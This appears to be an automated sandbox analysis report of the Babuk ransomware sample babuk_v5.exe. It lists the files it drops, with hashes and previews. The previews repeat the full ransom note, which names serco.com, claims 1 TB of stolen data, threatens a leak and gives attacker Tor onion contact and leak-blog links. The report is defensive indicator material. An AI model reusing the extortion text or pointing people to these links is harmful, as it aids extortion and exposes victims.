                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.55099558393286
                                                                            Encrypted:false
                                                                            SSDEEP:3:tl9WacQDLbuueaqQIS6+338HtQDHbAZ06nNAl/cNLUxNvEEn:NtcQK36X6/tQDEZ08At8L0vtn
                                                                            MD5:D4EEE500EB4B716FC54BB998765EC4CC
                                                                            SHA1:AC3F4986AA5E75E39F3776966197D29EED3596CE
                                                                            SHA-256:8382435AC35FA47A4D8BE0260CD86C10A6C714796F474B578588D91319DAD878
                                                                            SHA-512:AFD9722E8318D93BF25828463095FFCAAAB24DF06457177C90A39182B92843F73305C70643AB440B79835BCFFE355377EBDB72080F524179CBD408DF10147B95
                                                                            Malicious:false
                                                                            Preview: ....~[.)f........h..}.~y. LJ....cwxPY.D$..&.....YuF.<.....%2.q..Io.Rj.m.L.5P...Sb8=.0x.nY.I).c9..s.,..2..F.....<.....Q$gI..fe....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977948422572273
                                                                            Encrypted:false
                                                                            SSDEEP:192:DeovEj+RDMZ2WE7G0WTosp294i9GM6qILoglceaGGdpLJEVI:yov7UZLox4iQZqcbGdp6VI
                                                                            MD5:ECF31E82B331448DD25BA3EE54CCA239
                                                                            SHA1:366FFAB5A653DFBFE8A122E14DF76D56961EB01E
                                                                            SHA-256:EF749830CDF88FDF27BF98E9864898137A99EBFCC87EBD5D189C9F19A293CE96
                                                                            SHA-512:E6DC4B09232F4859EF6FFB0CE00483B6B59BAA85FE16556E950B850A9C9E2E2F63532DDEC2BE64D5901697CA49ADF709645300399A54C9DB52498C40BF557BCB
                                                                            Malicious:false
                                                                            Preview: 3......!.#....3......g.....&...y..d....._4..cd.....{.......hHY...1...N.....G..z.E.h,...p..R.%... ed<`...5.!.AhIX.1L"......jfM%._/[...D.HU...,....~.F....B.O...8.Ce]o..K..r.?....>~r|..'...B.).(.~...<g...}..o..)0.I..g..W...oveu........sZ.]....F%...I.7.....k.2..2O...../....<.3.../?...&Y.R.c..b?...`..!." ;..R...y`0>Vt.*9N ~,...G.Bt]`(...?.~..F.B..s..C.'.....a......O....Y..w=.....t..<.6*...........46?.jI. ..+[......B.`...t 3Vk.?....X..G.Cr...i.....;+..iF.[...=..RA*.#m7.$#B.07&C.z..#...@^t.bn.I...}v.A"?..QG.c.E..^~.....mN.....2WW.KJ..EN.F{7...`i...j.n...BNY..9..X/&O..yQ.4uN...x..s..}.EP.o.`t.72[.E3..."..(g...FL.._...w.....y..xvJX(.vaA..p._.....E....t.,...%T.OmS!r~....B.p&... M..._....Zk._.G.~..M"...Sk...!44......#~w.,K.......-..=.Z5,_u.v......8.u5.....@.!...1(......jKU.Q6CY...HF....-`..qErl...V\..4B.s....b..q...W...6yuJ.G...{0t..oYy[..n.u.9zl.......m+....&..@..ip%......._.........y...M.9.6u.s.X./x._...C.........iamt_t.A..'.....e.T.f..tCh....eT....
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
